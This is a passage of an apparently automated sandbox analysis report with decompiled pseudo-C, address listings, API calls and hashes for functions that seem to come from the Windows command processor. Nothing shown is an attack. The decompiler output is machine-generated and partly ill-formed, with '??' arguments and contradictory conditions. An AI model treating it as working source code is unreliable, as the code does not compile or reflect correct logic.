										L47:
									} while (FindNextFileW(_v628,  &(_v612.ftCreationTime)) != 0);
									goto L50;
								}
								L52:
								E011E0040(_t189);
								_t69 = _t124;
							}
						} else {
							L8:
							_t69 = 1;
						}
					}
				}
				_pop(_t177);
				_pop(_t186);
				_pop(_t120);
				return E011E6FD0(_t69, _t120, _v8 ^ _t194, _t164, _t177, _t186);
			}































































                                                    0x011f31e4
                                                    0x011f31ea
                                                    0x011f31f1
                                                    0x011f31fa
                                                    0x011f3201
                                                    0x011f3204
                                                    0x011f320b
                                                    0x011f320f
                                                    0x011f3213
                                                    0x011f3213
                                                    0x011f3216
                                                    0x011f321a
                                                    0x011f321c
                                                    0x011f321c
                                                    0x011f321f
                                                    0x011f3222
                                                    0x011f3229
                                                    0x011f322b
                                                    0x011f3230
                                                    0x011f34ed
                                                    0x011f34ed
                                                    0x011f3236
                                                    0x011f3236
                                                    0x011f3236
                                                    0x011f3238
                                                    0x011f3238
                                                    0x011f323b
                                                    0x011f323e
                                                    0x011f324b
                                                    0x011f324f
                                                    0x011f3257
                                                    0x00000000
                                                    0x011f325d
                                                    0x011f325d
                                                    0x011f3260
                                                    0x011f3263
                                                    0x011f326f
                                                    0x011f3273
                                                    0x011f3281
                                                    0x011f3283
                                                    0x011f3287
                                                    0x011f328c
                                                    0x011f328e
                                                    0x011f329e
                                                    0x011f32ab
                                                    0x011f32b9
                                                    0x011f32bb
                                                    0x011f32bd
                                                    0x011f32c6
                                                    0x011f32cd
                                                    0x011f32cd
                                                    0x011f328e
                                                    0x011f32d9
                                                    0x011f32e2
                                                    0x011f32ec
                                                    0x011f32f0
                                                    0x011f32f5
                                                    0x011f32fb
                                                    0x011f32fd
                                                    0x011f32fd
                                                    0x011f3300
                                                    0x011f3300
                                                    0x011f3303
                                                    0x011f3306
                                                    0x011f330f
                                                    0x011f330f
                                                    0x011f3315
                                                    0x011f331e
                                                    0x011f3322
                                                    0x00000000
                                                    0x011f3328
                                                    0x011f332d
                                                    0x011f3334
                                                    0x011f3336
                                                    0x011f333b
                                                    0x011f333d
                                                    0x011f333d
                                                    0x011f333f
                                                    0x011f3342
                                                    0x011f333d
                                                    0x011f3347
                                                    0x011f334a
                                                    0x011f3353
                                                    0x011f3357
                                                    0x011f3368
                                                    0x011f3370
                                                    0x011f3374
                                                    0x011f337a
                                                    0x011f34de
                                                    0x011f3380
                                                    0x011f3380
                                                    0x011f3385
                                                    0x011f34b2
                                                    0x011f34b2
                                                    0x00000000
                                                    0x011f338b
                                                    0x011f338b
                                                    0x011f3390
                                                    0x011f3394
                                                    0x011f3394
                                                    0x011f339a
                                                    0x00000000
                                                    0x00000000
                                                    0x011f339f
                                                    0x011f33b6
                                                    0x011f33b6
                                                    0x011f33b8
                                                    0x011f33a1
                                                    0x011f33a1
                                                    0x011f33a5
                                                    0x011f33a9
                                                    0x00000000
                                                    0x011f33ab
                                                    0x011f33ab
                                                    0x011f33ae
                                                    0x011f33b4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f33b4
                                                    0x011f33a9
                                                    0x011f33c3
                                                    0x011f33c5
                                                    0x00000000
                                                    0x011f33cb
                                                    0x011f33cb
                                                    0x011f33d0
                                                    0x011f33d4
                                                    0x011f33d4
                                                    0x011f33da
                                                    0x00000000
                                                    0x00000000
                                                    0x011f33df
                                                    0x011f33f6
                                                    0x011f33f6
                                                    0x011f33e1
                                                    0x011f33e1
                                                    0x011f33e5
                                                    0x011f33e9
                                                    0x00000000
                                                    0x011f33eb
                                                    0x011f33eb
                                                    0x011f33ee
                                                    0x011f33f4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f33f4
                                                    0x011f33e9
                                                    0x011f33ff
                                                    0x011f3401
                                                    0x00000000
                                                    0x011f3407
                                                    0x011f3407
                                                    0x011f3409
                                                    0x011f3409
                                                    0x011f340c
                                                    0x011f340c
                                                    0x011f340f
                                                    0x011f3412
                                                    0x011f3419
                                                    0x011f341d
                                                    0x011f341f
                                                    0x011f3422
                                                    0x011f3422
                                                    0x011f3425
                                                    0x011f3428
                                                    0x011f342f
                                                    0x011f3434
                                                    0x011f343a
                                                    0x011f346b
                                                    0x00000000
                                                    0x011f343c
                                                    0x011f343c
                                                    0x011f3441
                                                    0x011f3448
                                                    0x011f34d1
                                                    0x011f344e
                                                    0x011f344e
                                                    0x011f3450
                                                    0x011f3454
                                                    0x011f345d
                                                    0x011f3458
                                                    0x011f345a
                                                    0x011f345a
                                                    0x011f3462
                                                    0x011f3465
                                                    0x011f346f
                                                    0x011f3478
                                                    0x011f3486
                                                    0x011f348f
                                                    0x011f34a1
                                                    0x011f34a9
                                                    0x011f34ad
                                                    0x00000000
                                                    0x011f34ad
                                                    0x011f3448
                                                    0x011f343a
                                                    0x00000000
                                                    0x011f3401
                                                    0x011f33fa
                                                    0x011f33fc
                                                    0x00000000
                                                    0x011f33fc
                                                    0x00000000
                                                    0x011f33c5
                                                    0x011f33bc
                                                    0x011f33be
                                                    0x011f33c1
                                                    0x00000000
                                                    0x011f33c1
                                                    0x011f34d2
                                                    0x011f34d6
                                                    0x00000000
                                                    0x011f34b6
                                                    0x011f34c5
                                                    0x00000000
                                                    0x011f34cd
                                                    0x011f34e2
                                                    0x011f34e4
                                                    0x011f34e9
                                                    0x011f34e9
                                                    0x011f3275
                                                    0x011f3275
                                                    0x011f3277
                                                    0x011f3277
                                                    0x011f3273
                                                    0x011f3257
                                                    0x011f34f6
                                                    0x011f34f7
                                                    0x011f34f8
                                                    0x011f3503

                                                    APIs
                                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 011F3362
                                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 011F34BF
                                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F34D6
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                                    • Instruction ID: ea202249c0176331835fe5eea9022bca7728bbc3396f3b1e5b8ed8b726ba87c9
                                                    • Opcode Fuzzy Hash: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                                    • Instruction Fuzzy Hash: EF9105357182028BCB2DEF68C85056FB7E2FFD8244B45892DEA66C7344EB31D946C792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D443C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E011D443C(void* __ecx) {
				signed char _t5;
				void* _t12;

				_t12 = __ecx;
				_t5 = GetVersion();
				_push(E011D4476());
				_push(_t5 >> 0x10);
				_push(_t5 >> 0x00000008 & 0x000000ff);
				return E011E274C(_t12, 0x20, L"%d.%d.%05d.%d", _t5 & 0x000000ff);
			}





                                                    0x011d4440
                                                    0x011d4448
                                                    0x011d444f
                                                    0x011d445a
                                                    0x011d4461
                                                    0x011d4475

                                                    APIs
                                                    • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,011F731D,?,?,?,?,?), ref: 011D4442
                                                      • Part of subcall function 011D4476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 011D449A
                                                      • Part of subcall function 011D4476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 011D44BE
                                                      • Part of subcall function 011D4476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011D44C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseOpenQueryValueVersion
                                                    • String ID: %d.%d.%05d.%d
                                                    • API String ID: 2996790148-3457777122
                                                    • Opcode ID: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                                    • Instruction ID: d8b87bb812f0a474e0cfd25c28be566a08f53c50b86f9a5a476e0c8d96e635ac
                                                    • Opcode Fuzzy Hash: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                                    • Instruction Fuzzy Hash: 26D02BB1B5013037D62C65AA1C5DE7B508DC6E8022744402EF80193285DBB85C1442B4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F2258, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,011F2418), ref: 011F228B
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 1347740429-0
                                                    • Opcode ID: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                                    • Instruction ID: 62bec8d4ed78aa68b2ca6a63eafb7252236bc747a1e3d5367e4f69c6b4e06c6b
                                                    • Opcode Fuzzy Hash: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                                    • Instruction Fuzzy Hash: 0AF02034A0412EAB8F38DFB9B50977A3BE8AB65704B41015DE907C7145CF30E9009B92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E3D27, Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 299memorylibraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E011E3D27(void* __ebx, intOrPtr* __ecx) {
				signed int _v8;
				char _v72;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v96;
				void* _v100;
				intOrPtr* _v104;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				intOrPtr _t57;
				WCHAR* _t59;
				int _t60;
				WCHAR* _t72;
				struct HINSTANCE__* _t76;
				intOrPtr* _t80;
				int _t88;
				WCHAR* _t89;
				WCHAR* _t91;
				void* _t95;
				void* _t98;
				short _t100;
				intOrPtr* _t109;
				WCHAR* _t113;
				short _t122;
				short* _t125;
				void* _t129;
				long _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t139;

				_t95 = __ebx;
				_t26 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t26 ^ _t138;
				_t133 = __ecx;
				_v104 = __ecx;
				 *0x1203858 = 0x120385c;
				InitializeCriticalSection(0x120385c);
				EnterCriticalSection( *0x1203858);
				_t131 = 0;
				 *0x11fd544 = 0;
				LeaveCriticalSection( *0x1203858);
				_t29 = SetConsoleCtrlHandler(E011F6D90, 1);
				__imp___get_osfhandle(0x120387c);
				_t30 = GetConsoleMode(_t29, 1);
				__imp___get_osfhandle(0, 0x1203878);
				_pop(_t98);
				GetConsoleMode(_t30, ??);
				E011E06C0(_t98);
				 *0x1203834 = E011E3AAE();
				 *0x1203830 = E011E3B2C(_t98);
				E011E41DD(_t133);
				_t36 = GetCommandLineW();
				_t3 =  &(_t36[1]); // 0x2
				_t125 = _t3;
				do {
					_t100 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t100 != 0);
				_t144 = (_t36 - _t125 >> 1) + 1 - 0x2000;
				if((_t36 - _t125 >> 1) + 1 > 0x2000) {
					_push(0);
					E011DC5A2(0x2000);
					_t103 = 0x400023df;
					do {
						__eflags = E011E4B60(__eflags, 0);
					} while (__eflags == 0);
					L21:
					exit(1);
					L22:
					_push(_t131);
					E011DC5A2(_t103);
					_t103 = 0x2374;
					do {
						__eflags = E011E4B60(__eflags, _t131);
					} while (__eflags == 0);
					goto L21;
				}
				_t103 =  &_v100;
				E011E2A7C( &_v100, 0x2000, _t144);
				_t134 = _v100;
				if(_t134 == 0) {
					goto L22;
				}
				E011E1040(_t134, 0x2000, GetCommandLineW());
				if(E011E0C70(0x1213ab0, ((0 |  *0x1213cbc == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_push(0);
					E011DC5A2(0x1213ab0);
					_t103 = 0x2374;
					do {
						__eflags = E011E4B60(__eflags, 0);
					} while (__eflags == 0);
					goto L21;
				}
				_t108 =  *0x1213cb8;
				if( *0x1213cb8 == 0) {
					_t108 = 0x1213ab0;
				}
				E011E36CB(_t95, _t108,  *0x1213cc0, _t131);
				E011DCEA9();
				_t109 = _t134;
				_t129 = _t109 + 2;
				do {
					_t57 =  *_t109;
					_t109 = _t109 + 2;
					_t149 = _t57 - _t131;
				} while (_t57 != _t131);
				E011DD3F4(_v104, _t149, _t134, _t109 - _t129 >> 1);
				_t59 =  *0x1213cb8;
				_t130 = 0x1213ab0;
				_t113 = _t59;
				if(_t59 == 0) {
					_t113 = 0x1213ab0;
				}
				_t135 = 0x5c;
				_t136 = _v100;
				if( *_t113 == _t135) {
					_t103 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						_t103 = _t130;
					}
					_t137 = 0x5c;
					__eflags = _t103[1] - _t137;
					_t136 = _v100;
					if(_t103[1] != _t137) {
						goto L10;
					} else {
						__eflags =  *0x1218528;
						if( *0x1218528 != 0) {
							goto L10;
						}
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = _t130;
						}
						E011DC5A2(_t103, 0x400023c8, 1, _t59);
						_t91 =  *0x1213cb8;
						_t139 = _t139 + 0xc;
						__eflags = _t91;
						if(_t91 == 0) {
							_t91 = 0x1213ab0;
						}
						__eflags = GetWindowsDirectoryW(_t91,  *0x1213cc0);
						if(__eflags == 0) {
							do {
								__eflags = E011E4B60(__eflags, _t131);
							} while (__eflags == 0);
							goto L21;
						} else {
							_t124 =  *0x1213cb8;
							__eflags =  *0x1213cb8;
							if(__eflags == 0) {
								_t124 = 0x1213ab0;
							}
							_t130 = 0;
							E011E33FC(_t95, _t124, 0, _t131, _t136, __eflags);
							goto L10;
						}
					}
				} else {
					L10:
					_t60 = GetConsoleOutputCP();
					 *0x1203854 = _t60;
					GetCPInfo(_t60, 0x1203840);
					E011E3F80();
					_t64 = HeapAlloc(GetProcessHeap(), _t131, 0x20c);
					 *0x1203874 = _t64;
					if(_t64 != 0 && _t64 == 0) {
						_t64 =  *0x1203874;
						 *( *0x1203874) = 0;
					}
					if( *0x1213ccc == _t131) {
						__eflags = E011E269C(_t64);
						if(__eflags == 0) {
							goto L13;
						}
						__eflags =  *0x11fd5a0 - _t131; // 0x0
						if(__eflags != 0) {
							L51:
							_t122 =  *0x11fd5a0; // 0x0
							E011F7DF1(_t122, _t136);
							goto L13;
						}
						_t88 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v96);
						__eflags = _t88;
						if(_t88 == 0) {
							_t89 =  *0x11fd5a0; // 0x0
						} else {
							_t89 = _v96.wAttributes;
							 *0x11fd5a0 = _t89;
						}
						__eflags = _t89;
						if(__eflags == 0) {
							goto L13;
						} else {
							goto L51;
						}
					} else {
						L13:
						if( *((intOrPtr*)(_v104 + 8)) == _t131) {
							_v100 = E011F6456(__eflags);
							E011D443C( &_v72);
							E011DC108( &_v72, 0x2350, 1,  &_v72);
							E011E25D9(L"\r\n");
							_t72 = _v100;
							__eflags = _t72;
							if(_t72 == 0) {
								_push(_t131);
								_push(8);
								E011DC5A2( &_v72);
							} else {
								_push(_t72);
								E011E25D9(L"%s");
								E011E25D9(L"\r\n");
							}
							GlobalFree(_v100);
						}
						_t76 = GetModuleHandleW(L"KERNEL32.DLL");
						 *0x11fd0d0 = _t76;
						 *0x120388c = GetProcAddress(_t76, "CopyFileExW");
						GetProcAddress( *0x11fd0d0, "IsDebuggerPresent");
						 *0x1203888 = GetProcAddress( *0x11fd0d0, "SetConsoleInputExeNameW");
						_t80 = _v104;
						if( *_t80 != _t131 ||  *((intOrPtr*)(_t80 + 4)) != _t131 ||  *((intOrPtr*)(_t80 + 8)) != _t131) {
							_t131 = 1;
						}
						__imp__??_V@YAXPAX@Z();
						return E011E6FD0(_t131, _t95, _v8 ^ _t138, _t130, _t131, _t136, _t136);
					}
				}
			}








































                                                    0x011e3d27
                                                    0x011e3d2f
                                                    0x011e3d36
                                                    0x011e3d3f
                                                    0x011e3d43
                                                    0x011e3d46
                                                    0x011e3d4b
                                                    0x011e3d57
                                                    0x011e3d63
                                                    0x011e3d65
                                                    0x011e3d6b
                                                    0x011e3d78
                                                    0x011e3d85
                                                    0x011e3d8d
                                                    0x011e3d99
                                                    0x011e3d9f
                                                    0x011e3da1
                                                    0x011e3da7
                                                    0x011e3db1
                                                    0x011e3dbd
                                                    0x011e3dc2
                                                    0x011e3dc7
                                                    0x011e3dcd
                                                    0x011e3dcd
                                                    0x011e3dd0
                                                    0x011e3dd0
                                                    0x011e3dd3
                                                    0x011e3dd6
                                                    0x011e3de5
                                                    0x011e3de7
                                                    0x011ee043
                                                    0x011ee049
                                                    0x011ee04f
                                                    0x011ee050
                                                    0x011ee056
                                                    0x011ee056
                                                    0x011ee05a
                                                    0x011ee05c
                                                    0x011ee062
                                                    0x011ee062
                                                    0x011ee068
                                                    0x011ee06e
                                                    0x011ee06f
                                                    0x011ee075
                                                    0x011ee075
                                                    0x00000000
                                                    0x011ee079
                                                    0x011e3def
                                                    0x011e3df2
                                                    0x011e3df7
                                                    0x011e3dfc
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3e10
                                                    0x011e3e38
                                                    0x011ee07b
                                                    0x011ee081
                                                    0x011ee087
                                                    0x011ee088
                                                    0x011ee08e
                                                    0x011ee08e
                                                    0x00000000
                                                    0x011ee092
                                                    0x011e3e3e
                                                    0x011e3e46
                                                    0x011ee094
                                                    0x011ee094
                                                    0x011e3e53
                                                    0x011e3e58
                                                    0x011e3e5d
                                                    0x011e3e5f
                                                    0x011e3e62
                                                    0x011e3e62
                                                    0x011e3e65
                                                    0x011e3e68
                                                    0x011e3e68
                                                    0x011e3e76
                                                    0x011e3e7b
                                                    0x011e3e80
                                                    0x011e3e85
                                                    0x011e3e89
                                                    0x011ee09e
                                                    0x011ee09e
                                                    0x011e3e91
                                                    0x011e3e95
                                                    0x011e3e98
                                                    0x011ee0a5
                                                    0x011ee0a7
                                                    0x011ee0a9
                                                    0x011ee0ab
                                                    0x011ee0ab
                                                    0x011ee0af
                                                    0x011ee0b0
                                                    0x011ee0b4
                                                    0x011ee0b7
                                                    0x00000000
                                                    0x011ee0bd
                                                    0x011ee0bd
                                                    0x011ee0c4
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee0ca
                                                    0x011ee0cc
                                                    0x011ee0ce
                                                    0x011ee0ce
                                                    0x011ee0d8
                                                    0x011ee0dd
                                                    0x011ee0e2
                                                    0x011ee0e5
                                                    0x011ee0e7
                                                    0x011ee0e9
                                                    0x011ee0e9
                                                    0x011ee0fb
                                                    0x011ee0fd
                                                    0x011ee11a
                                                    0x011ee120
                                                    0x011ee120
                                                    0x00000000
                                                    0x011ee0ff
                                                    0x011ee0ff
                                                    0x011ee105
                                                    0x011ee107
                                                    0x011ee109
                                                    0x011ee109
                                                    0x011ee10e
                                                    0x011ee110
                                                    0x00000000
                                                    0x011ee110
                                                    0x011ee0fd
                                                    0x011e3e9e
                                                    0x011e3e9e
                                                    0x011e3e9e
                                                    0x011e3eaa
                                                    0x011e3eaf
                                                    0x011e3eb5
                                                    0x011e3ec7
                                                    0x011e3ecd
                                                    0x011e3ed4
                                                    0x011ee129
                                                    0x011ee130
                                                    0x011ee130
                                                    0x011e3ef0
                                                    0x011ee140
                                                    0x011ee142
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee148
                                                    0x011ee14f
                                                    0x011ee183
                                                    0x011ee183
                                                    0x011ee189
                                                    0x00000000
                                                    0x011ee189
                                                    0x011ee15e
                                                    0x011ee164
                                                    0x011ee166
                                                    0x011ee174
                                                    0x011ee168
                                                    0x011ee168
                                                    0x011ee16c
                                                    0x011ee16c
                                                    0x011ee17a
                                                    0x011ee17d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3ef6
                                                    0x011e3ef6
                                                    0x011e3efc
                                                    0x011ee19b
                                                    0x011ee19e
                                                    0x011ee1ae
                                                    0x011ee1b8
                                                    0x011ee1bd
                                                    0x011ee1c3
                                                    0x011ee1c5
                                                    0x011ee1e1
                                                    0x011ee1e2
                                                    0x011ee1e4
                                                    0x011ee1c7
                                                    0x011ee1c7
                                                    0x011ee1cd
                                                    0x011ee1d7
                                                    0x011ee1dc
                                                    0x011ee1ef
                                                    0x011ee1ef
                                                    0x011e3f07
                                                    0x011e3f13
                                                    0x011e3f29
                                                    0x011e3f2e
                                                    0x011e3f45
                                                    0x011e3f4a
                                                    0x011e3f4f
                                                    0x011e3f5d
                                                    0x011e3f5d
                                                    0x011e3f5f
                                                    0x011e3f77
                                                    0x011e3f77
                                                    0x011e3ef0

                                                    APIs
                                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                                    • _get_osfhandle.MSVCRT ref: 011E3D85
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                                    • _get_osfhandle.MSVCRT ref: 011E3D99
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06D8
                                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06EF
                                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E071E
                                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E0750
                                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                                      • Part of subcall function 011E3B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                                      • Part of subcall function 011E3B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                                      • Part of subcall function 011E41DD: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 011E423D
                                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 011E427D
                                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 011E42B7
                                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 011E4307
                                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 011E4341
                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 011E3E9E
                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E3EAF
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 011E3EC0
                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3EC7
                                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 011E3EDC
                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 011E3F07
                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 011E3F18
                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 011E3F2E
                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 011E3F3F
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3F5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOpenOutputTitlememcpy
                                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                    • API String ID: 570592814-3021193919
                                                    • Opcode ID: 1a02c7b1793679fccdff8a988619d566d4f715dfb039c36e752b51f12e581ea7
                                                    • Instruction ID: 646eff5731a0c69d76884a43f1222fa307c814a17551d9d95fe4b3ba8e390533
                                                    • Opcode Fuzzy Hash: 1a02c7b1793679fccdff8a988619d566d4f715dfb039c36e752b51f12e581ea7
                                                    • Instruction Fuzzy Hash: 2BA1A231A50701ABDF2DEBE9B81DAAA3BF6FBA4704B04415DE506C7188DF70D981CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E41DD, Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 311registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E011E41DD(intOrPtr* __ecx) {
				signed int _v8;
				char _v4100;
				long _v4104;
				int _v4108;
				int _v4112;
				void* _v4116;
				intOrPtr _v4120;
				intOrPtr _v4124;
				char _v4128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t85;
				int _t88;
				long _t97;
				long _t114;
				long _t127;
				long _t130;
				wchar_t* _t131;
				wchar_t* _t135;
				wchar_t* _t139;
				void* _t144;
				long _t146;
				void* _t151;
				long _t152;
				void* _t153;
				signed int _t159;
				intOrPtr* _t162;
				intOrPtr _t163;
				signed int _t166;
				void* _t167;
				void* _t189;

				E011E8290(0x101c);
				_t85 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t85 ^ _t166;
				_t162 = __ecx;
				_v4128 = 0x80000002;
				_v4124 = 0x80000001;
				_t163 = 2;
				 *0x1213cc9 = 1;
				_t144 =  &_v4128 - __ecx;
				_v4120 = _t163;
				while(1) {
					_t88 = RegOpenKeyExW( *(_t144 + _t162), L"Software\\Microsoft\\Command Processor", 0, 0x2000000,  &_v4116);
					if(_t88 != 0) {
						goto L33;
					}
					_v4108 = _v4108 & _t88;
					_v4112 = 0x1000;
